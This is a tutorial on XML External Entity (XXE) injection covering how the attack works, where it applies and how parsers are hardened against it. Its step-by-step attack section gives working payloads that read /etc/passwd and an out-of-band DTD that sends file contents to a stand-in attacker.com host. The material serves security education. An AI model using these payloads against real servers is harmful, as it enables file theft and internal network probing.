XXE (XML External Entity Injection) Vulnerability and Protection

XXE (XML External Entity Injection) Vulnerability and Protection

Description
XXE (XML External Entity Injection) is a security vulnerability targeting XML processors. Attackers can tamper with XML input to exploit external entity declarations, enabling them to read server files, launch SSRF attacks, or execute remote code. Since many applications (such as APIs and document parsers) use XML for data transmission, if the parser is not configured correctly, they are highly susceptible to XXE attacks.

Key Points

Basic XML Structure: XML documents can define entities (similar to variables), e.g., <!ENTITY name "value">.
External Entities: Use the SYSTEM keyword to reference external resources, e.g., <!ENTITY ext SYSTEM "file:///etc/passwd">.
Attack Principle: If the parser allows loading external entities, attackers can inject malicious entities to steal data or probe internal networks.

Step-by-Step Explanation of the Process

Step 1: Understanding How XML External Entities Work

Normal XML documents may contain predefined entities (e.g., < for <), but external entities allow loading data from files, URLs, etc.
Example: The following XML declares an external entity and references it:
```
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<user>&file;</user>
```
If the parser does not disable external entities, &file; will be replaced with the file content.

Step 2: Identifying XXE Attack Scenarios

Common Entry Points:
- Functions accepting XML input (e.g., API requests, file uploads, SOAP services).
- Parameters may be hidden in the Body or Header of HTTP requests.
Attack Types:
- File reading: Use the file:// protocol to read system files.
- SSRF attacks: Exploit the http:// protocol to access internal services.
- Blind XXE: Validate vulnerability existence via errors or Out-of-Band (OOB) data exfiltration.

Step 3: Manually Constructing XXE Attack Payloads

Basic attack (file reading):

<!-- Injected into XML input -->
<?xml version="1.0"?>
<!DOCTYPE attack [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

Blind scenario (no echo):

Use parameter entities + external DTD to trigger OOB data exfiltration:

<!-- Attacker-controlled DTD file (http://attacker.com/malicious.dtd) -->
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % oob "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%payload;'>">
%oob;

Step 4: Implementation Principles of Protective Measures

Disable External Entities:
- Explicitly set attributes in the parser (e.g., libxml_disable_entity_loader(true) in PHP).
- Configure FEATURE_SECURE_PROCESSING in Java's SAXParser or DocumentBuilder.
Use Whitelist Validation:
- Only allow safe XML structures; filter <!DOCTYPE> and <!ENTITY> declarations.
Convert Data Format:
- Replace XML with alternatives like JSON (e.g., for REST APIs).
Static Code Scanning:
- Check if the XML parser configuration in the code is secure.

Step 5: In-Depth Protection in Practice

Update dependencies (e.g., Apache Xerces disables external entities by default).
Network-layer restrictions: Prohibit outbound requests from the server hosting the parser to reduce SSRF risks.
Log monitoring: Abnormal XML requests should trigger alerts.

Through the above steps, one can systematically grasp the vulnerability principles, exploitation methods, and protection strategies for XXE. In actual development, it is essential to mandate disabling external entities during the design phase and combine code auditing tools to identify potential risks.